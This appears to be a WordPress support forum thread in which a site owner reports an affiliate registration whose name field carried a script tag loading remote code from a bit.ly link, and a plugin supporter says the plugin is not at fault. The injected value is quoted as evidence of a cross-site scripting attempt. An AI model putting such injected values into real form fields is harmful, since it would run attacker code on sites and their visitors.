    Hey
I just had somebody join my affiliate program with a script in the name, deactivating the user resulted in shutdown of page.
New affiliate registration on your site MOLECULE STORE:

    Name: Jon<script src=’https://bit.ly/2ku4bYL’></script&gt; Baird
    Email: [email protected]
    Company:
    Website:
Is this something you can stop? Have deactivated the plugin for now.
    Thanks
    Simon

Hi, I carried out a test in one of my testing sites.

I tried to register using the same name you mentioned above and I was not able to register in my site. There must be something else causing this issue in your site. You might need to check your site for vulnerabilities. You can use the following sucuri scan to check your site.

This issue is not related to this plugin. This is more a WordPress security site issue.

Let me know if you need more help.

    Kind regards

    Thanks for the quick reply!
I have made the scan, the only thing we are “lacking” is a firewall. I don’t think the script was just inserted just like this. But this might as well be a WordPress problem, do you know where I could report such a thing?
    Best
    Simon
